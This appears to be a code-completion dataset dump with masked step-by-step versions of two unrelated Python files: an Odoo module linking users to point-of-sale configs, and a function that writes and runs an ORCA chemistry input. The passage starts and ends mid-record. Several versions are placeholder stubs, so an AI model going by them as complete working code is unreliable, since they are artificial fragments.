self.env["pos.session.users"].search(
[('user', '=', self.id)]).unlink()
result = super(InheritUser, self).write(vals)
return result
@api.model
def create(self, vals):
create_id = super(InheritUser, self).create(vals)
if vals['pos_sessions'][0][2]:
for pos_session in vals['pos_sessions'][0][2]:
self.env['pos.session.users'].create({'pos_config': pos_session, 'user': create_id.id})
return create_id
|
normal
|
{
"blob_id": "2cff5fdfc86793592dd97de90ba9c3a11870b356",
"index": 8987,
"step-1": "<mask token>\n\n\nclass InheritUser(models.Model):\n _inherit = 'res.users'\n pos_sessions = fields.Many2many('pos.config', string=\n 'Point of Sale Accessible')\n\n @api.multi\n def write(self, vals):\n if 'pos_sessions' in vals:\n if vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': self.id})\n else:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n result = super(InheritUser, self).write(vals)\n return result\n\n @api.model\n def create(self, vals):\n create_id = super(InheritUser, self).create(vals)\n if vals['pos_sessions'][0][2]:\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': create_id.id})\n return create_id\n",
"step-2": "<mask token>\n\n\nclass InheritSession(models.Model):\n _name = 'pos.session.users'\n user = fields.Many2one('res.users')\n pos_config = fields.Many2one('pos.config')\n\n\nclass InheritUser(models.Model):\n _inherit = 'res.users'\n pos_sessions = fields.Many2many('pos.config', string=\n 'Point of Sale Accessible')\n\n @api.multi\n def write(self, vals):\n if 'pos_sessions' in vals:\n if vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': self.id})\n else:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n result = super(InheritUser, self).write(vals)\n return result\n\n @api.model\n def create(self, vals):\n create_id = super(InheritUser, self).create(vals)\n if vals['pos_sessions'][0][2]:\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': create_id.id})\n return create_id\n",
"step-3": "<mask token>\n\n\nclass InheritUser(models.Model):\n <mask token>\n <mask token>\n\n\nclass InheritSession(models.Model):\n _name = 'pos.session.users'\n user = fields.Many2one('res.users')\n pos_config = fields.Many2one('pos.config')\n\n\nclass InheritUser(models.Model):\n _inherit = 'res.users'\n pos_sessions = fields.Many2many('pos.config', string=\n 'Point of Sale Accessible')\n\n @api.multi\n def write(self, vals):\n if 'pos_sessions' in vals:\n if vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': self.id})\n else:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n result = super(InheritUser, self).write(vals)\n return result\n\n @api.model\n def create(self, vals):\n create_id = super(InheritUser, self).create(vals)\n if vals['pos_sessions'][0][2]:\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': create_id.id})\n return create_id\n",
"step-4": "<mask token>\n\n\nclass InheritUser(models.Model):\n _inherit = 'pos.config'\n related_pos_user = fields.One2many('pos.session.users', 'pos_config',\n string='Related User')\n\n\nclass InheritSession(models.Model):\n _name = 'pos.session.users'\n user = fields.Many2one('res.users')\n pos_config = fields.Many2one('pos.config')\n\n\nclass InheritUser(models.Model):\n _inherit = 'res.users'\n pos_sessions = fields.Many2many('pos.config', string=\n 'Point of Sale Accessible')\n\n @api.multi\n def write(self, vals):\n if 'pos_sessions' in vals:\n if vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': self.id})\n else:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n result = super(InheritUser, self).write(vals)\n return result\n\n @api.model\n def create(self, vals):\n create_id = super(InheritUser, self).create(vals)\n if vals['pos_sessions'][0][2]:\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': create_id.id})\n return create_id\n",
"step-5": "from odoo import api, tools, fields, models, _\nimport base64\nfrom odoo import modules\n\n\nclass InheritUser(models.Model):\n _inherit = 'pos.config'\n\n related_pos_user = fields.One2many('pos.session.users', 'pos_config', string='Related User')\n\n\nclass InheritSession(models.Model):\n _name = 'pos.session.users'\n\n user = fields.Many2one('res.users')\n pos_config = fields.Many2one('pos.config')\n\n\nclass InheritUser(models.Model):\n _inherit = 'res.users'\n\n pos_sessions = fields.Many2many('pos.config', string='Point of Sale Accessible')\n\n \n @api.multi\n def write(self, vals):\n if 'pos_sessions' in vals:\n if vals['pos_sessions'][0][2]:\n self.env[\"pos.session.users\"].search(\n [('user', '=', self.id)]).unlink()\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config': pos_session, 'user': self.id})\n else:\n self.env[\"pos.session.users\"].search(\n [('user', '=', self.id)]).unlink()\n result = super(InheritUser, self).write(vals)\n return result\n\n @api.model\n def create(self, vals):\n create_id = super(InheritUser, self).create(vals)\n if vals['pos_sessions'][0][2]:\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config': pos_session, 'user': create_id.id})\n return create_id\n",
"step-ids": [
4,
6,
7,
8,
10
]
}
|
[
4,
6,
7,
8,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def orca_run(method, basis, optfreq, custombasis, correlated, values,
charge, multip, sym, R_coord):
"""
Runs orca
Parameters:
method (char) : Name of functional to be used
basis (char) : Basis set name
optfreq (char) : true/false value of the optfreq keyword
custombasis (char) : true/false value of the custombasis keyword
correlated (char) : true/false value of the correlated keyword
values (dict): Values of the control variables
"""
with open('input.com', 'w') as com_f:
if optfreq == 'true':
if values['verticalIP'] != 'true' or values['IPss'] != 'true':
if values['MGGA'] == 'true':
Freqstr = 'NumFreq'
else:
Freqstr = 'Freq'
if custombasis == 'true':
com_f.write('! ' + str(method) + ' ' + values[
'String_Opt'] + ' ' + Freqstr + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) +
' ' + values['String_Opt'] + ' ' + Freqstr + ' \n')
elif custombasis == 'true':
com_f.write('! ' + str(method) + ' ' + Freqstr + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) + ' ' +
Freqstr + ' \n')
elif custombasis == 'true':
com_f.write('! ' + str(method) + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) + ' \n')
Nat = len(sym)
com_f.write('*xyz ' + str(charge) + ' ' + str(multip) + '\n')
for tmp in range(Nat):
R_x = float(R_coord[tmp][0])
R_y = float(R_coord[tmp][1])
R_z = float(R_coord[tmp][2])
com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\n'.format(sym[tmp],
R_x, R_y, R_z))
com_f.write('*\n')
com_f.write('%MaxCore ' + values['maxcore_mb'] + '\n')
com_f.write('%scf\n MaxIter 500 \n')
com_f.write(' Convergence ' + values['conv_scf'] + '\n')
com_f.write('end\n')
if values['switch_guess'] == 'true':
if values['guess_TM'] == 'true' and values['G4MP2TM']:
com_f.write(' Guess = ' + values['option_guess'] + '\n')
com_f.write('end\n')
if values['switch_load_rel_file'] == 'true':
f1 = open('rel_file.txt', 'r')
com_f.write(f1.read())
f1.close()
with open('Thermochemistry.out', 'a') as ther_chem:
ther_chem.write('check if rel_file.txt exists!!')
if values['SCFDIIS'] == 'true':
com_f.write('%scf\n DIISMaxEq 15\n')
com_f.write(' directresetfreq 1\n')
com_f.write('end\n')
if values['LSHIFT'] == 'true':
com_f.write('%scf\n')
com_f.write(' Shift Shift 0.1 ErrOff 0.1 end\n')
com_f.write('end\n')
if values['SOSCF'] == 'true':
com_f.write('%scf\n')
com_f.write(' soscfmaxit 12\n')
com_f.write(' directresetfreq 1\n')
com_f.write('end\n')
if values['switch_DLPNO_CCSDT'] == 'true':
com_f.write('%mdci\n')
com_f.write(' UseFullLMP2Guess true\n')
com_f.write(' TcutDOPre = ' + str(values['TcutDOPre']) + '\n')
com_f.write('end\n')
if float(values['Ntotale']) <= float(values['nproc']) or float(values
['Ntotale']) - float(values['Ntotalecore']) < float(values['nproc']
):
com_f.write('%pal nprocs 1 \n')
else:
com_f.write('%pal nprocs ' + values['nproc'] + ' \n')
com_f.write('end\n')
com_f.write('%method\n')
com_f.write(' IntAcc 7.0\n')
if values['optdiis'] == 'true':
com_f.write(' Z_solver DIIS\n')
com_f.write(' Z_MaxIter 300\n')
if correlated == 'true':
uniq_atom_res = uniqatoms(sym)
if values['ALLELE'] == 'true':
for iat in range(int(uniq_atom_res['N_ua'])):
pre1 = uniq_atom_res['uniq_sym']
at_pr1 = pre1[iat]
com_f.write(' NewNCore ' + at_pr1 + ' ' + ' 0 end\n')
else:
for iat in range(int(uniq_atom_res['N_ua'])):
pre1 = uniq_atom_res['uniq_sym']
at_pr1 = pre1[iat]
NFC_res = NFC(at_pr1)
com_f.write(' NewNCore ' + at_pr1 + ' ' + str(NFC_res
) + ' end\n')
com_f.write('end\n')
if optfreq == 'true':
com_f.write('%geom\n')
if values['MGGA'] == 'true':
com_f.write(' Calc_Hess true; NumHess true\n')
else:
com_f.write(' Calc_Hess true\n')
com_f.write(' Recalc_Hess ' + str(values['iterhess']) + ' \n')
com_f.write('end\n')
com_f.write('%freq Temp 273.15, 298.15\n')
com_f.write('end\n')
if custombasis == 'true':
com_f.write('%basis \n')
if custombasis == 'true':
uniq_atom_res = uniqatoms(sym)
fname = basis
if Nat == 1:
orca_printbas(fname, sym[0])
else:
for iat1 in range(int(uniq_atom_res['N_ua'])):
orca_printbas(fname, uniq_atom_res['uniq_sym'][iat1])
with open('input.com', 'a') as com_f:
com_f.write('end\n')
os.system(values['orca_exe'] + ' input.com > input.out')
os.system('cat input.com >> ORCA.inp')
os.system('cat input.out >> ORCA.out')
<|reserved_special_token_1|>
import os, sys, string
import linecache, math
import numpy as np
import datetime, time
from pople import NFC
from pople import uniqatoms
from pople import orca_printbas
def orca_run(method, basis, optfreq, custombasis, correlated, values,
charge, multip, sym, R_coord):
"""
Runs orca
Parameters:
method (char) : Name of functional to be used
basis (char) : Basis set name
optfreq (char) : true/false value of the optfreq keyword
custombasis (char) : true/false value of the custombasis keyword
correlated (char) : true/false value of the correlated keyword
values (dict): Values of the control variables
"""
with open('input.com', 'w') as com_f:
if optfreq == 'true':
if values['verticalIP'] != 'true' or values['IPss'] != 'true':
if values['MGGA'] == 'true':
Freqstr = 'NumFreq'
else:
Freqstr = 'Freq'
if custombasis == 'true':
com_f.write('! ' + str(method) + ' ' + values[
'String_Opt'] + ' ' + Freqstr + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) +
' ' + values['String_Opt'] + ' ' + Freqstr + ' \n')
elif custombasis == 'true':
com_f.write('! ' + str(method) + ' ' + Freqstr + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) + ' ' +
Freqstr + ' \n')
elif custombasis == 'true':
com_f.write('! ' + str(method) + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) + ' \n')
Nat = len(sym)
com_f.write('*xyz ' + str(charge) + ' ' + str(multip) + '\n')
for tmp in range(Nat):
R_x = float(R_coord[tmp][0])
R_y = float(R_coord[tmp][1])
R_z = float(R_coord[tmp][2])
com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\n'.format(sym[tmp],
R_x, R_y, R_z))
com_f.write('*\n')
com_f.write('%MaxCore ' + values['maxcore_mb'] + '\n')
com_f.write('%scf\n MaxIter 500 \n')
com_f.write(' Convergence ' + values['conv_scf'] + '\n')
com_f.write('end\n')
if values['switch_guess'] == 'true':
if values['guess_TM'] == 'true' and values['G4MP2TM']:
com_f.write(' Guess = ' + values['option_guess'] + '\n')
com_f.write('end\n')
if values['switch_load_rel_file'] == 'true':
f1 = open('rel_file.txt', 'r')
com_f.write(f1.read())
f1.close()
with open('Thermochemistry.out', 'a') as ther_chem:
ther_chem.write('check if rel_file.txt exists!!')
if values['SCFDIIS'] == 'true':
com_f.write('%scf\n DIISMaxEq 15\n')
com_f.write(' directresetfreq 1\n')
com_f.write('end\n')
if values['LSHIFT'] == 'true':
com_f.write('%scf\n')
com_f.write(' Shift Shift 0.1 ErrOff 0.1 end\n')
com_f.write('end\n')
if values['SOSCF'] == 'true':
com_f.write('%scf\n')
com_f.write(' soscfmaxit 12\n')
com_f.write(' directresetfreq 1\n')
com_f.write('end\n')
if values['switch_DLPNO_CCSDT'] == 'true':
com_f.write('%mdci\n')
com_f.write(' UseFullLMP2Guess true\n')
com_f.write(' TcutDOPre = ' + str(values['TcutDOPre']) + '\n')
com_f.write('end\n')
if float(values['Ntotale']) <= float(values['nproc']) or float(values
['Ntotale']) - float(values['Ntotalecore']) < float(values['nproc']
):
com_f.write('%pal nprocs 1 \n')
else:
com_f.write('%pal nprocs ' + values['nproc'] + ' \n')
com_f.write('end\n')
com_f.write('%method\n')
com_f.write(' IntAcc 7.0\n')
if values['optdiis'] == 'true':
com_f.write(' Z_solver DIIS\n')
com_f.write(' Z_MaxIter 300\n')
if correlated == 'true':
uniq_atom_res = uniqatoms(sym)
if values['ALLELE'] == 'true':
for iat in range(int(uniq_atom_res['N_ua'])):
pre1 = uniq_atom_res['uniq_sym']
at_pr1 = pre1[iat]
com_f.write(' NewNCore ' + at_pr1 + ' ' + ' 0 end\n')
else:
for iat in range(int(uniq_atom_res['N_ua'])):
pre1 = uniq_atom_res['uniq_sym']
at_pr1 = pre1[iat]
NFC_res = NFC(at_pr1)
com_f.write(' NewNCore ' + at_pr1 + ' ' + str(NFC_res
) + ' end\n')
com_f.write('end\n')
if optfreq == 'true':
com_f.write('%geom\n')
if values['MGGA'] == 'true':
com_f.write(' Calc_Hess true; NumHess true\n')
else:
com_f.write(' Calc_Hess true\n')
com_f.write(' Recalc_Hess ' + str(values['iterhess']) + ' \n')
com_f.write('end\n')
com_f.write('%freq Temp 273.15, 298.15\n')
com_f.write('end\n')
if custombasis == 'true':
com_f.write('%basis \n')
if custombasis == 'true':
uniq_atom_res = uniqatoms(sym)
fname = basis
if Nat == 1:
orca_printbas(fname, sym[0])
else:
for iat1 in range(int(uniq_atom_res['N_ua'])):
orca_printbas(fname, uniq_atom_res['uniq_sym'][iat1])
with open('input.com', 'a') as com_f:
com_f.write('end\n')
os.system(values['orca_exe'] + ' input.com > input.out')
os.system('cat input.com >> ORCA.inp')
os.system('cat input.out >> ORCA.out')
<|reserved_special_token_1|>
import os, sys, string
import linecache, math
import numpy as np
import datetime , time
from pople import NFC
from pople import uniqatoms
from pople import orca_printbas
####### orca_run - S
def orca_run(method, basis,optfreq,custombasis, correlated, values, charge, multip, sym, R_coord):
"""
Runs orca
Parameters:
method (char) : Name of functional to be used
basis (char) : Basis set name
optfreq (char) : true/false value of the optfreq keyword
custombasis (char) : true/false value of the custombasis keyword
correlated (char) : true/false value of the correlated keyword
values (dict): Values of the control variables
"""
with open("input.com", "w") as com_f:
if optfreq == "true":
if values["verticalIP"] != "true" or values["IPss"] != "true": # IPss not defined
if values["MGGA"] == "true":
Freqstr="NumFreq"
else:
Freqstr="Freq"
if custombasis == "true":
com_f.write("! " +str(method) + " " + values["String_Opt"] + " " + Freqstr + " \n")
else:
com_f.write("! " +str(method) + " " + str(basis) +" "+values["String_Opt"] + " " + Freqstr + " \n")
else:
if custombasis == "true":
com_f.write("! " +str(method) + " " + Freqstr + " \n")
else:
com_f.write("! " +str(method) + " " + str(basis) + " " + Freqstr + " \n")
else:
if custombasis == "true":
com_f.write("! " +str(method) + " \n")
else:
com_f.write("! " +str(method) + " " + str(basis) + " \n")
Nat=len(sym)
com_f.write("*xyz "+str(charge)+" "+str(multip) + "\n")
for tmp in range(Nat):
R_x=float(R_coord[tmp][0])
R_y=float(R_coord[tmp][1])
R_z=float(R_coord[tmp][2])
com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\n'.format(sym[tmp],R_x,R_y,R_z))
com_f.write("*\n")
com_f.write("%MaxCore " + values["maxcore_mb"] + "\n")
com_f.write("%scf\n MaxIter 500 \n")
com_f.write(" Convergence " + values["conv_scf"] + "\n")
com_f.write("end\n")
if values["switch_guess"] == "true": ### this is not part of the inp file!!!
if values["guess_TM"] == "true" and values["G4MP2TM"]:
com_f.write(" Guess = " + values["option_guess"] + "\n")
com_f.write("end\n")
if values["switch_load_rel_file"] == "true":
f1 = open("rel_file.txt", "r")
com_f.write(f1.read())
f1.close()
with open("Thermochemistry.out", "a") as ther_chem:
ther_chem.write("check if rel_file.txt exists!!")
if values["SCFDIIS"] == "true":
com_f.write("%scf\n DIISMaxEq 15\n")
com_f.write(" directresetfreq 1\n")
com_f.write("end\n")
if values["LSHIFT"] == "true":
com_f.write("%scf\n")
com_f.write(" Shift Shift 0.1 ErrOff 0.1 end\n")
com_f.write("end\n")
if values["SOSCF"] == "true":
com_f.write("%scf\n")
com_f.write(" soscfmaxit 12\n")
com_f.write(" directresetfreq 1\n")
com_f.write("end\n")
if values["switch_DLPNO_CCSDT"] == "true":
com_f.write("%mdci\n")
com_f.write(" UseFullLMP2Guess true\n")
com_f.write(" TcutDOPre = " + str(values["TcutDOPre"]) +"\n") #TODO Is this really needed?
com_f.write("end\n")
if ( float(values["Ntotale"]) <= float(values["nproc"]) ) or ( (float(values["Ntotale"])-float(values["Ntotalecore"])) < float(values["nproc"]) ):
com_f.write("%pal nprocs 1 \n")
else:
com_f.write("%pal nprocs "+values["nproc"]+" \n")
com_f.write("end\n")
com_f.write("%method\n") ## CHECK
com_f.write(" IntAcc 7.0\n")
if values["optdiis"] == "true":
com_f.write(" Z_solver DIIS\n")
com_f.write(" Z_MaxIter 300\n")
if correlated == "true":
uniq_atom_res = uniqatoms(sym)
if values["ALLELE"] == "true": ### CHECK!!!!
for iat in range(int(uniq_atom_res["N_ua"])):
pre1 = uniq_atom_res["uniq_sym"]
at_pr1 = pre1[iat]
com_f.write(" NewNCore " + at_pr1 + " " + " 0 end\n")
else:
for iat in range(int(uniq_atom_res["N_ua"])):
pre1 = uniq_atom_res["uniq_sym"]
at_pr1 = pre1[iat]
NFC_res = NFC(at_pr1)
com_f.write(" NewNCore " + at_pr1 + " " + str(NFC_res) +" end\n")
com_f.write("end\n")
if optfreq == "true":
com_f.write("%geom\n")
if values["MGGA"] == "true":
com_f.write(" Calc_Hess true; NumHess true\n")
else:
com_f.write(" Calc_Hess true\n")
com_f.write(" Recalc_Hess " + str(values["iterhess"]) +" \n") ## revisit !!!! CHECK!!! IMPORTANT
com_f.write("end\n")
com_f.write("%freq Temp 273.15, 298.15\n")
com_f.write("end\n")
if custombasis == "true":
com_f.write("%basis \n")
if custombasis == "true":
uniq_atom_res = uniqatoms(sym)
fname = basis
if Nat == 1:
orca_printbas(fname, sym[0])
else:
for iat1 in range(int(uniq_atom_res["N_ua"])):
orca_printbas(fname, uniq_atom_res["uniq_sym"][iat1]) # GTBAS1 C
with open("input.com", "a") as com_f:
com_f.write("end\n")
os.system(values["orca_exe"] + " input.com > input.out")
os.system("cat input.com >> ORCA.inp")
os.system("cat input.out >> ORCA.out")
#os.system("rm -f input*")
####### orca_run - E
|
flexible
|
{
"blob_id": "019e8d7159fe07adc245e6476ac1fed5e9c457b5",
"index": 3035,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef orca_run(method, basis, optfreq, custombasis, correlated, values,\n charge, multip, sym, R_coord):\n \"\"\"\n Runs orca\n\n Parameters:\n method (char) : Name of functional to be used\n basis (char) : Basis set name\n optfreq (char) : true/false value of the optfreq keyword \n custombasis (char) : true/false value of the custombasis keyword\n correlated (char) : true/false value of the correlated keyword \n values (dict): Values of the control variables \n\n \"\"\"\n with open('input.com', 'w') as com_f:\n if optfreq == 'true':\n if values['verticalIP'] != 'true' or values['IPss'] != 'true':\n if values['MGGA'] == 'true':\n Freqstr = 'NumFreq'\n else:\n Freqstr = 'Freq'\n if custombasis == 'true':\n com_f.write('! ' + str(method) + ' ' + values[\n 'String_Opt'] + ' ' + Freqstr + ' \\n')\n else:\n com_f.write('! ' + str(method) + ' ' + str(basis) +\n ' ' + values['String_Opt'] + ' ' + Freqstr + ' \\n')\n elif custombasis == 'true':\n com_f.write('! ' + str(method) + ' ' + Freqstr + ' \\n')\n else:\n com_f.write('! ' + str(method) + ' ' + str(basis) + ' ' +\n Freqstr + ' \\n')\n elif custombasis == 'true':\n com_f.write('! ' + str(method) + ' \\n')\n else:\n com_f.write('! ' + str(method) + ' ' + str(basis) + ' \\n')\n Nat = len(sym)\n com_f.write('*xyz ' + str(charge) + ' ' + str(multip) + '\\n')\n for tmp in range(Nat):\n R_x = float(R_coord[tmp][0])\n R_y = float(R_coord[tmp][1])\n R_z = float(R_coord[tmp][2])\n com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\\n'.format(sym[tmp],\n R_x, R_y, R_z))\n com_f.write('*\\n')\n com_f.write('%MaxCore ' + values['maxcore_mb'] + '\\n')\n com_f.write('%scf\\n MaxIter 500 \\n')\n com_f.write(' Convergence ' + values['conv_scf'] + '\\n')\n com_f.write('end\\n')\n if values['switch_guess'] == 'true':\n if values['guess_TM'] == 'true' and values['G4MP2TM']:\n com_f.write(' Guess = ' + values['option_guess'] + '\\n')\n com_f.write('end\\n')\n if values['switch_load_rel_file'] == 'true':\n f1 = open('rel_file.txt', 'r')\n com_f.write(f1.read())\n f1.close()\n with open('Thermochemistry.out', 'a') as ther_chem:\n ther_chem.write('check if rel_file.txt exists!!')\n if values['SCFDIIS'] == 'true':\n com_f.write('%scf\\n DIISMaxEq 15\\n')\n com_f.write(' directresetfreq 1\\n')\n com_f.write('end\\n')\n if values['LSHIFT'] == 'true':\n com_f.write('%scf\\n')\n com_f.write(' Shift Shift 0.1 ErrOff 0.1 end\\n')\n com_f.write('end\\n')\n if values['SOSCF'] == 'true':\n com_f.write('%scf\\n')\n com_f.write(' soscfmaxit 12\\n')\n com_f.write(' directresetfreq 1\\n')\n com_f.write('end\\n')\n if values['switch_DLPNO_CCSDT'] == 'true':\n com_f.write('%mdci\\n')\n com_f.write(' UseFullLMP2Guess true\\n')\n com_f.write(' TcutDOPre = ' + str(values['TcutDOPre']) + '\\n')\n com_f.write('end\\n')\n if float(values['Ntotale']) <= float(values['nproc']) or float(values\n ['Ntotale']) - float(values['Ntotalecore']) < float(values['nproc']\n ):\n com_f.write('%pal nprocs 1 \\n')\n else:\n com_f.write('%pal nprocs ' + values['nproc'] + ' \\n')\n com_f.write('end\\n')\n com_f.write('%method\\n')\n com_f.write(' IntAcc 7.0\\n')\n if values['optdiis'] == 'true':\n com_f.write(' Z_solver DIIS\\n')\n com_f.write(' Z_MaxIter 300\\n')\n if correlated == 'true':\n uniq_atom_res = uniqatoms(sym)\n if values['ALLELE'] == 'true':\n for iat in range(int(uniq_atom_res['N_ua'])):\n pre1 = uniq_atom_res['uniq_sym']\n at_pr1 = pre1[iat]\n com_f.write(' NewNCore ' + at_pr1 + ' ' + ' 0 end\\n')\n else:\n for iat in range(int(uniq_atom_res['N_ua'])):\n pre1 = uniq_atom_res['uniq_sym']\n at_pr1 = pre1[iat]\n NFC_res = NFC(at_pr1)\n com_f.write(' NewNCore ' + at_pr1 + ' ' + str(NFC_res\n ) + ' end\\n')\n com_f.write('end\\n')\n if optfreq == 'true':\n com_f.write('%geom\\n')\n if values['MGGA'] == 'true':\n com_f.write(' Calc_Hess true; NumHess true\\n')\n else:\n com_f.write(' Calc_Hess true\\n')\n com_f.write(' Recalc_Hess ' + str(values['iterhess']) + ' \\n')\n com_f.write('end\\n')\n com_f.write('%freq Temp 273.15, 298.15\\n')\n com_f.write('end\\n')\n if custombasis == 'true':\n com_f.write('%basis \\n')\n if custombasis == 'true':\n uniq_atom_res = uniqatoms(sym)\n fname = basis\n if Nat == 1:\n orca_printbas(fname, sym[0])\n else:\n for iat1 in range(int(uniq_atom_res['N_ua'])):\n orca_printbas(fname, uniq_atom_res['uniq_sym'][iat1])\n with open('input.com', 'a') as com_f:\n com_f.write('end\\n')\n os.system(values['orca_exe'] + ' input.com > input.out')\n os.system('cat input.com >> ORCA.inp')\n os.system('cat input.out >> ORCA.out')\n",
"step-3": "import os, sys, string\nimport linecache, math\nimport numpy as np\nimport datetime, time\nfrom pople import NFC\nfrom pople import uniqatoms\nfrom pople import orca_printbas\n\n\ndef orca_run(method, basis, optfreq, custombasis, correlated, values,\n charge, multip, sym, R_coord):\n \"\"\"\n Runs orca\n\n Parameters:\n method (char) : Name of functional to be used\n basis (char) : Basis set name\n optfreq (char) : true/false value of the optfreq keyword \n custombasis (char) : true/false value of the custombasis keyword\n correlated (char) : true/false value of the correlated keyword \n values (dict): Values of the control variables \n\n \"\"\"\n with open('input.com', 'w') as com_f:\n if optfreq == 'true':\n if values['verticalIP'] != 'true' or values['IPss'] != 'true':\n if values['MGGA'] == 'true':\n Freqstr = 'NumFreq'\n else:\n Freqstr = 'Freq'\n if custombasis == 'true':\n com_f.write('! ' + str(method) + ' ' + values[\n 'String_Opt'] + ' ' + Freqstr + ' \\n')\n else:\n com_f.write('! ' + str(method) + ' ' + str(basis) +\n ' ' + values['String_Opt'] + ' ' + Freqstr + ' \\n')\n elif custombasis == 'true':\n com_f.write('! ' + str(method) + ' ' + Freqstr + ' \\n')\n else:\n com_f.write('! ' + str(method) + ' ' + str(basis) + ' ' +\n Freqstr + ' \\n')\n elif custombasis == 'true':\n com_f.write('! ' + str(method) + ' \\n')\n else:\n com_f.write('! ' + str(method) + ' ' + str(basis) + ' \\n')\n Nat = len(sym)\n com_f.write('*xyz ' + str(charge) + ' ' + str(multip) + '\\n')\n for tmp in range(Nat):\n R_x = float(R_coord[tmp][0])\n R_y = float(R_coord[tmp][1])\n R_z = float(R_coord[tmp][2])\n com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\\n'.format(sym[tmp],\n R_x, R_y, R_z))\n com_f.write('*\\n')\n com_f.write('%MaxCore ' + values['maxcore_mb'] + '\\n')\n com_f.write('%scf\\n MaxIter 500 \\n')\n com_f.write(' Convergence ' + values['conv_scf'] + '\\n')\n com_f.write('end\\n')\n if values['switch_guess'] == 'true':\n if values['guess_TM'] == 'true' and values['G4MP2TM']:\n com_f.write(' Guess = ' + values['option_guess'] + '\\n')\n com_f.write('end\\n')\n if values['switch_load_rel_file'] == 'true':\n f1 = open('rel_file.txt', 'r')\n com_f.write(f1.read())\n f1.close()\n with open('Thermochemistry.out', 'a') as ther_chem:\n ther_chem.write('check if rel_file.txt exists!!')\n if values['SCFDIIS'] == 'true':\n com_f.write('%scf\\n DIISMaxEq 15\\n')\n com_f.write(' directresetfreq 1\\n')\n com_f.write('end\\n')\n if values['LSHIFT'] == 'true':\n com_f.write('%scf\\n')\n com_f.write(' Shift Shift 0.1 ErrOff 0.1 end\\n')\n com_f.write('end\\n')\n if values['SOSCF'] == 'true':\n com_f.write('%scf\\n')\n com_f.write(' soscfmaxit 12\\n')\n com_f.write(' directresetfreq 1\\n')\n com_f.write('end\\n')\n if values['switch_DLPNO_CCSDT'] == 'true':\n com_f.write('%mdci\\n')\n com_f.write(' UseFullLMP2Guess true\\n')\n com_f.write(' TcutDOPre = ' + str(values['TcutDOPre']) + '\\n')\n com_f.write('end\\n')\n if float(values['Ntotale']) <= float(values['nproc']) or float(values\n ['Ntotale']) - float(values['Ntotalecore']) < float(values['nproc']\n ):\n com_f.write('%pal nprocs 1 \\n')\n else:\n com_f.write('%pal nprocs ' + values['nproc'] + ' \\n')\n com_f.write('end\\n')\n com_f.write('%method\\n')\n com_f.write(' IntAcc 7.0\\n')\n if values['optdiis'] == 'true':\n com_f.write(' Z_solver DIIS\\n')\n com_f.write(' Z_MaxIter 300\\n')\n if correlated == 'true':\n uniq_atom_res = uniqatoms(sym)\n if values['ALLELE'] == 'true':\n for iat in range(int(uniq_atom_res['N_ua'])):\n pre1 = uniq_atom_res['uniq_sym']\n at_pr1 = pre1[iat]\n com_f.write(' NewNCore ' + at_pr1 + ' ' + ' 0 end\\n')\n else:\n for iat in range(int(uniq_atom_res['N_ua'])):\n pre1 = uniq_atom_res['uniq_sym']\n at_pr1 = pre1[iat]\n NFC_res = NFC(at_pr1)\n com_f.write(' NewNCore ' + at_pr1 + ' ' + str(NFC_res\n ) + ' end\\n')\n com_f.write('end\\n')\n if optfreq == 'true':\n com_f.write('%geom\\n')\n if values['MGGA'] == 'true':\n com_f.write(' Calc_Hess true; NumHess true\\n')\n else:\n com_f.write(' Calc_Hess true\\n')\n com_f.write(' Recalc_Hess ' + str(values['iterhess']) + ' \\n')\n com_f.write('end\\n')\n com_f.write('%freq Temp 273.15, 298.15\\n')\n com_f.write('end\\n')\n if custombasis == 'true':\n com_f.write('%basis \\n')\n if custombasis == 'true':\n uniq_atom_res = uniqatoms(sym)\n fname = basis\n if Nat == 1:\n orca_printbas(fname, sym[0])\n else:\n for iat1 in range(int(uniq_atom_res['N_ua'])):\n orca_printbas(fname, uniq_atom_res['uniq_sym'][iat1])\n with open('input.com', 'a') as com_f:\n com_f.write('end\\n')\n os.system(values['orca_exe'] + ' input.com > input.out')\n os.system('cat input.com >> ORCA.inp')\n os.system('cat input.out >> ORCA.out')\n",
